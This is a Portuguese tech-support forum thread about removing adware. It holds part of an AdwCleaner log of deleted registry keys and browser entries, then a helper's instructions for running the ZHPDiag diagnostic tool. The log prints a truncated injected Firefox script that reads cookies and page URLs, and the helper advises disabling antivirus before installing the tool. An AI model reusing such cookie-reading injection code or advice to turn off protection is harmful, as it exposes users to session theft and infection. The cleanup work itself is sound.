Chave Deletedo : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}

Chave Deletedo : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}

Chave Deletedo : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}

Chave Deletedo : HKCU\Software\FreeSoftToday

Chave Deletedo : HKCU\Software\SaveSenseLive

Chave Deletedo : HKCU\Software\TutoTag

Chave Deletedo : HKCU\Software\UpdaterEX

Chave Deletedo : HKLM\Software\Bench

Chave Deletedo : HKLM\Software\FreeSoftToday

Chave Deletedo : HKLM\Software\hdcode

Chave Deletedo : HKLM\Software\SaveSenseLive

Chave Deletedo : HKLM\Software\Tutorials

Chave Deletedo : HKLM\Software\V9

Chave Deletedo : HKLM\Software\Wpm

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7DD5E91C-3864-77EC-7635-D14910C2A03E}

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveSenseLive.exe


***** [ Navegadores ] *****


-\\ Internet Explorer v10.0.9200.17028


Configurações Restauradas : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]

Configurações Restauradas : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]

Configurações Restauradas : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [start Page]

Configurações Restauradas : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [search Page]


-\\ Mozilla Firefox v28.0 (pt-BR)


[ Arquivo : C:\Users\Tião'\AppData\Roaming\Mozilla\Firefox\Profiles\nmi2j58p.default\prefs.js ]


Linha deletada : user_pref("extensions.IJ9VKm.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]


-\\ Google Chrome v36.0.1985.125


[ Arquivo : C:\Users\Tião'\AppData\Local\Google\Chrome\User Data\Default\preferences ]


Deletedo [Extension] : pkndmigholgfjlniaohblojbhgjbkakn


*************************


AdwCleaner[R0].txt - [15679 octets] - [20/07/2014 19:18:06]

AdwCleaner[s0].txt - [14432 octets] - [20/07/2014 19:20:47]


########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [14493 octets] ##########

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa Noite! Weick

 

|- Baixe: < ZHPDiag2.exe > < NicolasCoolman.jpg > ( ... de Nicolas Coolman )
|- Salve-o no disco local! ( C ou D )
|- Desabilite seu antivírus e execute "ZHPDiag2.exe",para instalar a ferramenta.
ZHPDiag_Pergaminho2_zps6e758639.jpg
|- Execute o ícone do pergaminho. ( ZHPDiag )
ZHPDiag_Pesquisar_zps3acb0f25.jpg
|- Clique "SEARCH" ou "PESQUISAR" e aguarde a conclusão!
zhpdia11.png
|- Clique OK e,ao concluir,poste o relatório! ( ZHPDiag.txt )
|- Ps: Se o log for extenso,envie-o à Pjjoint.malekal.
|- Ou acesse: < Cjoint_Logo.jpg >
|- Maiores informações: < |Link| >
A+

Compartilhar este post


Link para o post
Compartilhar em outros sites

Tópico Arquivado

 

Como o autor não respondeu por mais de 10 dias, o tópico foi arquivado.

 

Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.

Compartilhar este post


Link para o post
Compartilhar em outros sites

×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.